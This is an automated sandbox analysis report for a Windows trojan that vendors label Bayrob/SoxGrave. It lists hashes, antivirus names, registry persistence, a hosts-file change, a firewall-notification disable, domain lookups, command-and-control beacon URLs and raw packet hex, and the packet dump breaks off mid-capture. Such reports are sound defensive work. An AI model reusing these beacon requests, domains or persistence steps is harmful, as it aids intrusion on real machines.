Analysis Date | 2015-09-15 15:36:32 |
---|---|
MD5 | a67297798c188b224d858f38ce2f381b |
SHA1 | ffd4a50c0721b4908cc9cac48810fb468d2c1adf |
Static Details:
File type | PE32 executable for MS Windows (GUI) Intel 80386 32-bit | |
---|---|---|
Section | .text md5: ffd85d76763a3346c12b6b0757150478 sha1: a84e6db75d2f7f18dcf020cf091f3badae918ca2 size: 1223168 | |
Section | .rdata md5: 0a1e95db6195eaa75d59577835a9fe55 sha1: 1be1bf7ceeb37dadcc74d7e939b149131e635cdb size: 321536 | |
Section | .data md5: 3099300fca511d47e26944db2d46b29b sha1: a2647d4cbf52fe6dc3b5546b9ceee81c1815b9ef size: 8192 | |
Section | .reloc md5: a3953f2a61838eaa65c4a932d168f7fd sha1: 2737fd215a0b7697c26aac9bda13bb94b161291b size: 160256 | |
Timestamp | 2015-05-11 04:37:16 | |
Packer | VC8 -> Microsoft Corporation | |
PEhash | f6126c46fd877d44a4e4fb571cdd1ef5cf23b990 | |
IMPhash | 985e81f3267377bd9755c939bc62c7bd | |
AV | Rising | 0x59002d5f |
AV | CA (E-Trust Ino) | no_virus |
AV | F-Secure | Gen:Variant.Diley.1 |
AV | Dr. Web | Trojan.Bayrob.5 |
AV | ClamAV | no_virus |
AV | Arcabit (arcavir) | Gen:Variant.Diley.1 |
AV | BullGuard | Gen:Variant.Diley.1 |
AV | Padvish | no_virus |
AV | VirusBlokAda (vba32) | no_virus |
AV | CAT (quickheal) | no_virus |
AV | Trend Micro | no_virus |
AV | Kaspersky | Backdoor.Win32.SoxGrave.bxy |
AV | Zillya! | no_virus |
AV | Emsisoft | Gen:Variant.Diley.1 |
AV | Ikarus | Trojan.Win32.Bayrob |
AV | Frisk (f-prot) | no_virus |
AV | Authentium | W32/SoxGrave.A.gen!Eldorado |
AV | MalwareBytes | no_virus |
AV | MicroWorld (escan) | Gen:Variant.Diley.1 |
AV | Microsoft Security Essentials | Trojan:Win32/Dynamer!ac |
AV | K7 | Trojan ( 004c77f41 ) |
AV | BitDefender | Gen:Variant.Diley.1 |
AV | Fortinet | W32/Bayrob.X!tr |
AV | Symantec | Downloader.Upatre!g15 |
AV | Grisoft (avg) | Win32/Cryptor |
AV | Eset (nod32) | Win32/Bayrob.Z |
AV | Alwil (avast) | Dropper-OJQ [Drp] |
AV | Ad-Aware | Gen:Variant.Diley.1 |
AV | Twister | no_virus |
AV | Avira (antivir) | TR/Crypt.Xpack.277318 |
AV | Mcafee | Trojan-FGIJ!A67297798C18 |
Runtime Details:
Screenshot | ![]() |
---|
Process
↳ C:\malware.exe
Creates File | C:\WINDOWS\system32\mkueqvu\tst |
---|---|
Creates File | C:\Documents and Settings\Administrator\Local Settings\Temp\lw8kyfn1mltgrzbzlpadcg.exe |
Creates Process | C:\Documents and Settings\Administrator\Local Settings\Temp\lw8kyfn1mltgrzbzlpadcg.exe |
Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\lw8kyfn1mltgrzbzlpadcg.exe
Registry | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\SPP Bus Control Engine Alerts Fax Gateway List ➝ C:\WINDOWS\system32\wonfykgn.exe |
---|---|
Creates File | C:\WINDOWS\system32\mkueqvu\etc |
Creates File | C:\WINDOWS\system32\drivers\etc\hosts |
Creates File | C:\WINDOWS\system32\mkueqvu\lck |
Creates File | C:\WINDOWS\system32\mkueqvu\tst |
Creates File | C:\WINDOWS\system32\wonfykgn.exe |
Deletes File | C:\WINDOWS\system32\\drivers\etc\hosts |
Creates Process | C:\WINDOWS\system32\wonfykgn.exe |
Creates Service | Thread Reporting Fax Provider Policy IP - C:\WINDOWS\system32\wonfykgn.exe |
Process
↳ C:\WINDOWS\system32\svchost.exe
Process
↳ Pid 808
Process
↳ Pid 856
Process
↳ C:\WINDOWS\System32\svchost.exe
Registry | HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM\List of event-active namespaces ➝ NULL |
---|---|
Creates File | PIPE\lsarpc |
Creates File | C:\WINDOWS\system32\WBEM\Repository\$WinMgmt.CFG |
Creates File | C:\WINDOWS\system32\WBEM\Logs\wbemess.log |
Process
↳ Pid 1212
Process
↳ Pid 1324
Process
↳ Pid 1868
Process
↳ Pid 1172
Process
↳ C:\WINDOWS\system32\wonfykgn.exe
Registry | HKEY_LOCAL_MACHINE\Software\Microsoft\Security Center\FirewallDisableNotify ➝ 1 |
---|---|
Creates File | C:\WINDOWS\system32\mkueqvu\tst |
Creates File | C:\WINDOWS\TEMP\lw8kyfn1u8zgrzb.exe |
Creates File | C:\WINDOWS\system32\mkueqvu\rng |
Creates File | pipe\net\NtControlPipe10 |
Creates File | C:\WINDOWS\system32\mkueqvu\lck |
Creates File | C:\WINDOWS\system32\nxwlyxgfyhtu.exe |
Creates File | C:\WINDOWS\system32\mkueqvu\cfg |
Creates File | \Device\Afd\Endpoint |
Creates File | C:\WINDOWS\system32\mkueqvu\run |
Deletes File | C:\WINDOWS\TEMP\lw8kyfn1u8zgrzb.exe |
Creates Process | C:\WINDOWS\TEMP\lw8kyfn1u8zgrzb.exe -r 52144 tcp |
Creates Process | WATCHDOGPROC "c:\windows\system32\wonfykgn.exe" |
Process
↳ C:\WINDOWS\system32\wonfykgn.exe
Creates File | C:\WINDOWS\system32\mkueqvu\tst |
---|
Process
↳ WATCHDOGPROC "c:\windows\system32\wonfykgn.exe"
Creates File | C:\WINDOWS\system32\mkueqvu\tst |
---|
Process
↳ C:\WINDOWS\TEMP\lw8kyfn1u8zgrzb.exe -r 52144 tcp
Network Details:
DNS | recordsoldier.net Type: A 208.91.197.241 |
---|---|
DNS | fliersurprise.net Type: A 208.91.197.241 |
DNS | historybright.net Type: A 208.91.197.241 |
DNS | chiefsoldier.net Type: A 208.91.197.241 |
DNS | classsurprise.net Type: A 208.91.197.241 |
DNS | thosecontinue.net Type: A 208.91.197.241 |
DNS | throughcontain.net Type: A 208.91.197.241 |
DNS | belongguard.net Type: A 208.91.197.241 |
DNS | maybellinethaddeus.net Type: A 208.91.197.241 |
DNS | kimberleyshavonne.net Type: A 208.91.197.241 |
DNS | naildeep.com Type: A 74.220.215.218 |
DNS | riddenstorm.net Type: A 66.147.240.171 |
DNS | destroystorm.net Type: A 216.239.138.86 |
DNS | wheelagree.net Type: A 95.211.230.75 |
DNS | sticktouch.net Type: A 217.160.26.221 |
DNS | lifeform.net Type: A 66.147.240.162 |
DNS | enemyagree.net Type: A 195.22.26.253 |
DNS | enemyagree.net Type: A 195.22.26.254 |
DNS | enemyagree.net Type: A 195.22.26.231 |
DNS | enemyagree.net Type: A 195.22.26.252 |
DNS | lifetouch.net Type: A 216.245.135.10 |
DNS | lifeword.net Type: A 61.100.9.214 |
DNS | mouthword.net Type: A 66.96.163.129 |
DNS | lifeclock.net Type: A 162.212.2.137 |
DNS | lifeclock.net Type: A 198.46.51.193 |
DNS | husbandfound.net Type: A |
DNS | leadershort.net Type: A |
DNS | eggbraker.com Type: A |
DNS | ithouneed.com Type: A |
DNS | soilword.net Type: A |
DNS | wheelform.net Type: A |
DNS | saidform.net Type: A |
DNS | saidagree.net Type: A |
DNS | wheeltouch.net Type: A |
DNS | saidtouch.net Type: A |
DNS | wheelword.net Type: A |
DNS | saidword.net Type: A |
DNS | stickform.net Type: A |
DNS | ballform.net Type: A |
DNS | stickagree.net Type: A |
DNS | ballagree.net Type: A |
DNS | balltouch.net Type: A |
DNS | stickword.net Type: A |
DNS | ballword.net Type: A |
DNS | enemyform.net Type: A |
DNS | lifeagree.net Type: A |
DNS | enemytouch.net Type: A |
DNS | enemyword.net Type: A |
DNS | mouthform.net Type: A |
DNS | tillform.net Type: A |
DNS | mouthagree.net Type: A |
DNS | tillagree.net Type: A |
DNS | mouthtouch.net Type: A |
DNS | tilltouch.net Type: A |
DNS | tillword.net Type: A |
DNS | shallform.net Type: A |
DNS | deepform.net Type: A |
DNS | shallagree.net Type: A |
DNS | deepagree.net Type: A |
DNS | shalltouch.net Type: A |
DNS | deeptouch.net Type: A |
DNS | shallword.net Type: A |
DNS | deepword.net Type: A |
DNS | pushform.net Type: A |
DNS | fridayform.net Type: A |
DNS | pushagree.net Type: A |
DNS | fridayagree.net Type: A |
DNS | pushtouch.net Type: A |
DNS | fridaytouch.net Type: A |
DNS | pushword.net Type: A |
DNS | fridayword.net Type: A |
DNS | alongform.net Type: A |
DNS | decemberform.net Type: A |
DNS | alongagree.net Type: A |
DNS | decemberagree.net Type: A |
DNS | alongtouch.net Type: A |
DNS | decembertouch.net Type: A |
DNS | alongword.net Type: A |
DNS | decemberword.net Type: A |
DNS | longhard.net Type: A |
DNS | soilhard.net Type: A |
DNS | longclock.net Type: A |
DNS | soilclock.net Type: A |
DNS | longmake.net Type: A |
DNS | soilmake.net Type: A |
DNS | longrush.net Type: A |
DNS | soilrush.net Type: A |
DNS | wheelhard.net Type: A |
DNS | saidhard.net Type: A |
DNS | wheelclock.net Type: A |
DNS | saidclock.net Type: A |
DNS | wheelmake.net Type: A |
DNS | saidmake.net Type: A |
DNS | wheelrush.net Type: A |
DNS | saidrush.net Type: A |
DNS | stickhard.net Type: A |
DNS | ballhard.net Type: A |
DNS | stickclock.net Type: A |
DNS | ballclock.net Type: A |
DNS | stickmake.net Type: A |
DNS | ballmake.net Type: A |
DNS | stickrush.net Type: A |
DNS | ballrush.net Type: A |
DNS | enemyhard.net Type: A |
DNS | lifehard.net Type: A |
DNS | enemyclock.net Type: A |
HTTP GET | http://recordsoldier.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent: |
HTTP GET | http://fliersurprise.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent: |
HTTP GET | http://historybright.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent: |
HTTP GET | http://chiefsoldier.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent: |
HTTP GET | http://classsurprise.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent: |
HTTP GET | http://thosecontinue.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent: |
HTTP GET | http://throughcontain.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent: |
HTTP GET | http://belongguard.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent: |
HTTP GET | http://maybellinethaddeus.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent: |
HTTP GET | http://kimberleyshavonne.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent: |
HTTP GET | http://naildeep.com/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent: |
HTTP GET | http://riddenstorm.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent: |
HTTP GET | http://destroystorm.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent: |
HTTP GET | http://wheelagree.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent: |
HTTP GET | http://sticktouch.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent: |
HTTP GET | http://lifeform.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent: |
HTTP GET | http://enemyagree.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent: |
HTTP GET | http://lifetouch.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent: |
HTTP GET | http://lifeword.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent: |
HTTP GET | http://mouthword.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent: |
HTTP GET | http://lifeclock.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent: |
HTTP GET | http://recordsoldier.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent: |
HTTP GET | http://fliersurprise.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent: |
HTTP GET | http://historybright.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent: |
HTTP GET | http://chiefsoldier.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent: |
HTTP GET | http://classsurprise.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent: |
HTTP GET | http://thosecontinue.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent: |
HTTP GET | http://throughcontain.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent: |
HTTP GET | http://belongguard.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent: |
HTTP GET | http://maybellinethaddeus.net/index.php?method=validate&mode=sox&v=050&sox=4fae0a00&lenhdr User-Agent: |
Flows TCP | 192.168.1.1:1036 ➝ 208.91.197.241:80 |
Flows TCP | 192.168.1.1:1037 ➝ 208.91.197.241:80 |
Flows TCP | 192.168.1.1:1038 ➝ 208.91.197.241:80 |
Flows TCP | 192.168.1.1:1039 ➝ 208.91.197.241:80 |
Flows TCP | 192.168.1.1:1040 ➝ 208.91.197.241:80 |
Flows TCP | 192.168.1.1:1041 ➝ 208.91.197.241:80 |
Flows TCP | 192.168.1.1:1042 ➝ 208.91.197.241:80 |
Flows TCP | 192.168.1.1:1044 ➝ 208.91.197.241:80 |
Flows TCP | 192.168.1.1:1045 ➝ 208.91.197.241:80 |
Flows TCP | 192.168.1.1:1046 ➝ 208.91.197.241:80 |
Flows TCP | 192.168.1.1:1047 ➝ 74.220.215.218:80 |
Flows TCP | 192.168.1.1:1048 ➝ 66.147.240.171:80 |
Flows TCP | 192.168.1.1:1049 ➝ 216.239.138.86:80 |
Flows TCP | 192.168.1.1:1050 ➝ 95.211.230.75:80 |
Flows TCP | 192.168.1.1:1051 ➝ 217.160.26.221:80 |
Flows TCP | 192.168.1.1:1052 ➝ 66.147.240.162:80 |
Flows TCP | 192.168.1.1:1053 ➝ 195.22.26.253:80 |
Flows TCP | 192.168.1.1:1054 ➝ 216.245.135.10:80 |
Flows TCP | 192.168.1.1:1055 ➝ 61.100.9.214:80 |
Flows TCP | 192.168.1.1:1056 ➝ 66.96.163.129:80 |
Flows TCP | 192.168.1.1:1057 ➝ 162.212.2.137:80 |
Flows TCP | 192.168.1.1:1058 ➝ 208.91.197.241:80 |
Flows TCP | 192.168.1.1:1059 ➝ 208.91.197.241:80 |
Flows TCP | 192.168.1.1:1060 ➝ 208.91.197.241:80 |
Flows TCP | 192.168.1.1:1061 ➝ 208.91.197.241:80 |
Flows TCP | 192.168.1.1:1062 ➝ 208.91.197.241:80 |
Flows TCP | 192.168.1.1:1063 ➝ 208.91.197.241:80 |
Flows TCP | 192.168.1.1:1064 ➝ 208.91.197.241:80 |
Flows TCP | 192.168.1.1:1065 ➝ 208.91.197.241:80 |
Flows TCP | 192.168.1.1:1066 ➝ 208.91.197.241:80 |
Raw Pcap
0x00000000 (00000) 47455420 2f696e64 65782e70 68703f6d GET /index.php?m 0x00000010 (00016) 6574686f 643d7661 6c696461 7465266d ethod=validate&m 0x00000020 (00032) 6f64653d 736f7826 763d3035 3026736f ode=sox&v=050&so 0x00000030 (00048) 783d3466 61653061 3030266c 656e6864 x=4fae0a00&lenhd 0x00000040 (00064) 72204854 54502f31 2e300d0a 41636365 r HTTP/1.0..Acce 0x00000050 (00080) 70743a20 2a2f2a0d 0a436f6e 6e656374 pt: */*..Connect 0x00000060 (00096) 696f6e3a 20636c6f 73650d0a 486f7374 ion: close..Host 0x00000070 (00112) 3a207265 636f7264 736f6c64 6965722e : recordsoldier. 0x00000080 (00128) 6e65740d 0a0d0a net.... 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f6d GET /index.php?m 0x00000010 (00016) 6574686f 643d7661 6c696461 7465266d ethod=validate&m 0x00000020 (00032) 6f64653d 736f7826 763d3035 3026736f ode=sox&v=050&so 0x00000030 (00048) 783d3466 61653061 3030266c 656e6864 x=4fae0a00&lenhd 0x00000040 (00064) 72204854 54502f31 2e300d0a 41636365 r HTTP/1.0..Acce 0x00000050 (00080) 70743a20 2a2f2a0d 0a436f6e 6e656374 pt: */*..Connect 0x00000060 (00096) 696f6e3a 20636c6f 73650d0a 486f7374 ion: close..Host 0x00000070 (00112) 3a20666c 69657273 75727072 6973652e : fliersurprise. 0x00000080 (00128) 6e65740d 0a0d0a net.... 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f6d GET /index.php?m 0x00000010 (00016) 6574686f 643d7661 6c696461 7465266d ethod=validate&m 0x00000020 (00032) 6f64653d 736f7826 763d3035 3026736f ode=sox&v=050&so 0x00000030 (00048) 783d3466 61653061 3030266c 656e6864 x=4fae0a00&lenhd 0x00000040 (00064) 72204854 54502f31 2e300d0a 41636365 r HTTP/1.0..Acce 0x00000050 (00080) 70743a20 2a2f2a0d 0a436f6e 6e656374 pt: */*..Connect 0x00000060 (00096) 696f6e3a 20636c6f 73650d0a 486f7374 ion: close..Host 0x00000070 (00112) 3a206869 73746f72 79627269 6768742e : historybright. 0x00000080 (00128) 6e65740d 0a0d0a net.... 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f6d GET /index.php?m 0x00000010 (00016) 6574686f 643d7661 6c696461 7465266d ethod=validate&m 0x00000020 (00032) 6f64653d 736f7826 763d3035 3026736f ode=sox&v=050&so 0x00000030 (00048) 783d3466 61653061 3030266c 656e6864 x=4fae0a00&lenhd 0x00000040 (00064) 72204854 54502f31 2e300d0a 41636365 r HTTP/1.0..Acce 0x00000050 (00080) 70743a20 2a2f2a0d 0a436f6e 6e656374 pt: */*..Connect 0x00000060 (00096) 696f6e3a 20636c6f 73650d0a 486f7374 ion: close..Host 0x00000070 (00112) 3a206368 69656673 6f6c6469 65722e6e : chiefsoldier.n 0x00000080 (00128) 65740d0a 0d0a0a et..... 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f6d GET /index.php?m 0x00000010 (00016) 6574686f 643d7661 6c696461 7465266d ethod=validate&m 0x00000020 (00032) 6f64653d 736f7826 763d3035 3026736f ode=sox&v=050&so 0x00000030 (00048) 783d3466 61653061 3030266c 656e6864 x=4fae0a00&lenhd 0x00000040 (00064) 72204854 54502f31 2e300d0a 41636365 r HTTP/1.0..Acce 0x00000050 (00080) 70743a20 2a2f2a0d 0a436f6e 6e656374 pt: */*..Connect 0x00000060 (00096) 696f6e3a 20636c6f 73650d0a 486f7374 ion: close..Host 0x00000070 (00112) 3a20636c 61737373 75727072 6973652e : classsurprise. 0x00000080 (00128) 6e65740d 0a0d0a net.... 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f6d GET /index.php?m 0x00000010 (00016) 6574686f 643d7661 6c696461 7465266d ethod=validate&m 0x00000020 (00032) 6f64653d 736f7826 763d3035 3026736f ode=sox&v=050&so 0x00000030 (00048) 783d3466 61653061 3030266c 656e6864 x=4fae0a00&lenhd 0x00000040 (00064) 72204854 54502f31 2e300d0a 41636365 r HTTP/1.0..Acce 0x00000050 (00080) 70743a20 2a2f2a0d 0a436f6e 6e656374 pt: */*..Connect 0x00000060 (00096) 696f6e3a 20636c6f 73650d0a 486f7374 ion: close..Host 0x00000070 (00112) 3a207468 6f736563 6f6e7469 6e75652e : thosecontinue. 0x00000080 (00128) 6e65740d 0a0d0a net.... 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f6d GET /index.php?m 0x00000010 (00016) 6574686f 643d7661 6c696461 7465266d ethod=validate&m 0x00000020 (00032) 6f64653d 736f7826 763d3035 3026736f ode=sox&v=050&so 0x00000030 (00048) 783d3466 61653061 3030266c 656e6864 x=4fae0a00&lenhd 0x00000040 (00064) 72204854 54502f31 2e300d0a 41636365 r HTTP/1.0..Acce 0x00000050 (00080) 70743a20 2a2f2a0d 0a436f6e 6e656374 pt: */*..Connect 0x00000060 (00096) 696f6e3a 20636c6f 73650d0a 486f7374 ion: close..Host 0x00000070 (00112) 3a207468 726f7567 68636f6e 7461696e : throughcontain 0x00000080 (00128) 2e6e6574 0d0a0d0a .net.... 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f6d GET /index.php?m 0x00000010 (00016) 6574686f 643d7661 6c696461 7465266d ethod=validate&m 0x00000020 (00032) 6f64653d 736f7826 763d3035 3026736f ode=sox&v=050&so 0x00000030 (00048) 783d3466 61653061 3030266c 656e6864 x=4fae0a00&lenhd 0x00000040 (00064) 72204854 54502f31 2e300d0a 41636365 r HTTP/1.0..Acce 0x00000050 (00080) 70743a20 2a2f2a0d 0a436f6e 6e656374 pt: */*..Connect 0x00000060 (00096) 696f6e3a 20636c6f 73650d0a 486f7374 ion: close..Host 0x00000070 (00112) 3a206265 6c6f6e67 67756172 642e6e65 : belongguard.ne 0x00000080 (00128) 740d0a0d 0a0a0d0a t....... 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f6d GET /index.php?m 0x00000010 (00016) 6574686f 643d7661 6c696461 7465266d ethod=validate&m 0x00000020 (00032) 6f64653d 736f7826 763d3035 3026736f ode=sox&v=050&so 0x00000030 (00048) 783d3466 61653061 3030266c 656e6864 x=4fae0a00&lenhd 0x00000040 (00064) 72204854 54502f31 2e300d0a 41636365 r HTTP/1.0..Acce 0x00000050 (00080) 70743a20 2a2f2a0d 0a436f6e 6e656374 pt: */*..Connect 0x00000060 (00096) 696f6e3a 20636c6f 73650d0a 486f7374 ion: close..Host 0x00000070 (00112) 3a206d61 7962656c 6c696e65 74686164 : maybellinethad 0x00000080 (00128) 64657573 2e6e6574 0d0a0d0a deus.net.... 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f6d GET /index.php?m 0x00000010 (00016) 6574686f 643d7661 6c696461 7465266d ethod=validate&m 0x00000020 (00032) 6f64653d 736f7826 763d3035 3026736f ode=sox&v=050&so 0x00000030 (00048) 783d3466 61653061 3030266c 656e6864 x=4fae0a00&lenhd 0x00000040 (00064) 72204854 54502f31 2e300d0a 41636365 r HTTP/1.0..Acce 0x00000050 (00080) 70743a20 2a2f2a0d 0a436f6e 6e656374 pt: */*..Connect 0x00000060 (00096) 696f6e3a 20636c6f 73650d0a 486f7374 ion: close..Host 0x00000070 (00112) 3a206b69 6d626572 6c657973 6861766f : kimberleyshavo 0x00000080 (00128) 6e6e652e 6e65740d 0a0d0a0a nne.net..... 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f6d GET /index.php?m 0x00000010 (00016) 6574686f 643d7661 6c696461 7465266d ethod=validate&m 0x00000020 (00032) 6f64653d 736f7826 763d3035 3026736f ode=sox&v=050&so 0x00000030 (00048) 783d3466 61653061 3030266c 656e6864 x=4fae0a00&lenhd 0x00000040 (00064) 72204854 54502f31 2e300d0a 41636365 r HTTP/1.0..Acce 0x00000050 (00080) 70743a20 2a2f2a0d 0a436f6e 6e656374 pt: */*..Connect 0x00000060 (00096) 696f6e3a 20636c6f 73650d0a 486f7374 ion: close..Host 0x00000070 (00112) 3a206e61 696c6465 65702e63 6f6d0d0a : naildeep.com.. 0x00000080 (00128) 0d0a652e 6e65740d 0a0d0a0a ..e.net..... 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f6d GET /index.php?m 0x00000010 (00016) 6574686f 643d7661 6c696461 7465266d ethod=validate&m 0x00000020 (00032) 6f64653d 736f7826 763d3035 3026736f ode=sox&v=050&so 0x00000030 (00048) 783d3466 61653061 3030266c 656e6864 x=4fae0a00&lenhd 0x00000040 (00064) 72204854 54502f31 2e300d0a 41636365 r HTTP/1.0..Acce 0x00000050 (00080) 70743a20 2a2f2a0d 0a436f6e 6e656374 pt: */*..Connect 0x00000060 (00096) 696f6e3a 20636c6f 73650d0a 486f7374 ion: close..Host 0x00000070 (00112) 3a207269 6464656e 73746f72 6d2e6e65 : riddenstorm.ne 0x00000080 (00128) 740d0a0d 0a65740d 0a0d0a0a t....et..... 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f6d GET /index.php?m 0x00000010 (00016) 6574686f 643d7661 6c696461 7465266d ethod=validate&m 0x00000020 (00032) 6f64653d 736f7826 763d3035 3026736f ode=sox&v=050&so 0x00000030 (00048) 783d3466 61653061 3030266c 656e6864 x=4fae0a00&lenhd 0x00000040 (00064) 72204854 54502f31 2e300d0a 41636365 r HTTP/1.0..Acce 0x00000050 (00080) 70743a20 2a2f2a0d 0a436f6e 6e656374 pt: */*..Connect 0x00000060 (00096) 696f6e3a 20636c6f 73650d0a 486f7374 ion: close..Host 0x00000070 (00112) 3a206465 7374726f 7973746f 726d2e6e : destroystorm.n 0x00000080 (00128) 65740d0a 0d0a740d 0a0d0a0a et....t..... 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f6d GET /index.php?m 0x00000010 (00016) 6574686f 643d7661 6c696461 7465266d ethod=validate&m 0x00000020 (00032) 6f64653d 736f7826 763d3035 3026736f ode=sox&v=050&so 0x00000030 (00048) 783d3466 61653061 3030266c 656e6864 x=4fae0a00&lenhd 0x00000040 (00064) 72204854 54502f31 2e300d0a 41636365 r HTTP/1.0..Acce 0x00000050 (00080) 70743a20 2a2f2a0d 0a436f6e 6e656374 pt: */*..Connect 0x00000060 (00096) 696f6e3a 20636c6f 73650d0a 486f7374 ion: close..Host 0x00000070 (00112) 3a207768 65656c61 67726565 2e6e6574 : wheelagree.net 0x00000080 (00128) 0d0a0d0a 0d0a740d 0a0d0a0a ......t..... 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f6d GET /index.php?m 0x00000010 (00016) 6574686f 643d7661 6c696461 7465266d ethod=validate&m 0x00000020 (00032) 6f64653d 736f7826 763d3035 3026736f ode=sox&v=050&so 0x00000030 (00048) 783d3466 61653061 3030266c 656e6864 x=4fae0a00&lenhd 0x00000040 (00064) 72204854 54502f31 2e300d0a 41636365 r HTTP/1.0..Acce 0x00000050 (00080) 70743a20 2a2f2a0d 0a436f6e 6e656374 pt: */*..Connect 0x00000060 (00096) 696f6e3a 20636c6f 73650d0a 486f7374 ion: close..Host 0x00000070 (00112) 3a207374 69636b74 6f756368 2e6e6574 : sticktouch.net 0x00000080 (00128) 0d0a0d0a 0d0a740d 0a0d0a0a ......t..... 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f6d GET /index.php?m 0x00000010 (00016) 6574686f 643d7661 6c696461 7465266d ethod=validate&m 0x00000020 (00032) 6f64653d 736f7826 763d3035 3026736f ode=sox&v=050&so 0x00000030 (00048) 783d3466 61653061 3030266c 656e6864 x=4fae0a00&lenhd 0x00000040 (00064) 72204854 54502f31 2e300d0a 41636365 r HTTP/1.0..Acce 0x00000050 (00080) 70743a20 2a2f2a0d 0a436f6e 6e656374 pt: */*..Connect 0x00000060 (00096) 696f6e3a 20636c6f 73650d0a 486f7374 ion: close..Host 0x00000070 (00112) 3a206c69 6665666f 726d2e6e 65740d0a : lifeform.net.. 0x00000080 (00128) 0d0a0d0a 0d0a740d 0a0d0a0a ......t..... 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f6d GET /index.php?m 0x00000010 (00016) 6574686f 643d7661 6c696461 7465266d ethod=validate&m 0x00000020 (00032) 6f64653d 736f7826 763d3035 3026736f ode=sox&v=050&so 0x00000030 (00048) 783d3466 61653061 3030266c 656e6864 x=4fae0a00&lenhd 0x00000040 (00064) 72204854 54502f31 2e300d0a 41636365 r HTTP/1.0..Acce 0x00000050 (00080) 70743a20 2a2f2a0d 0a436f6e 6e656374 pt: */*..Connect 0x00000060 (00096) 696f6e3a 20636c6f 73650d0a 486f7374 ion: close..Host 0x00000070 (00112) 3a20656e 656d7961 67726565 2e6e6574 : enemyagree.net 0x00000080 (00128) 0d0a0d0a 0d0a740d 0a0d0a0a ......t..... 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f6d GET /index.php?m 0x00000010 (00016) 6574686f 643d7661 6c696461 7465266d ethod=validate&m 0x00000020 (00032) 6f64653d 736f7826 763d3035 3026736f ode=sox&v=050&so 0x00000030 (00048) 783d3466 61653061 3030266c 656e6864 x=4fae0a00&lenhd 0x00000040 (00064) 72204854 54502f31 2e300d0a 41636365 r HTTP/1.0..Acce 0x00000050 (00080) 70743a20 2a2f2a0d 0a436f6e 6e656374 pt: */*..Connect 0x00000060 (00096) 696f6e3a 20636c6f 73650d0a 486f7374 ion: close..Host 0x00000070 (00112) 3a206c69 6665746f 7563682e 6e65740d : lifetouch.net. 0x00000080 (00128) 0a0d0a0a 0d0a740d 0a0d0a0a ......t..... 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f6d GET /index.php?m 0x00000010 (00016) 6574686f 643d7661 6c696461 7465266d ethod=validate&m 0x00000020 (00032) 6f64653d 736f7826 763d3035 3026736f ode=sox&v=050&so 0x00000030 (00048) 783d3466 61653061 3030266c 656e6864 x=4fae0a00&lenhd 0x00000040 (00064) 72204854 54502f31 2e300d0a 41636365 r HTTP/1.0..Acce 0x00000050 (00080) 70743a20 2a2f2a0d 0a436f6e 6e656374 pt: */*..Connect 0x00000060 (00096) 696f6e3a 20636c6f 73650d0a 486f7374 ion: close..Host 0x00000070 (00112) 3a206c69 6665776f 72642e6e 65740d0a : lifeword.net.. 0x00000080 (00128) 0d0a0a0a 0d0a740d 0a0d0a0a ......t..... 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f6d GET /index.php?m 0x00000010 (00016) 6574686f 643d7661 6c696461 7465266d ethod=validate&m 0x00000020 (00032) 6f64653d 736f7826 763d3035 3026736f ode=sox&v=050&so 0x00000030 (00048) 783d3466 61653061 3030266c 656e6864 x=4fae0a00&lenhd 0x00000040 (00064) 72204854 54502f31 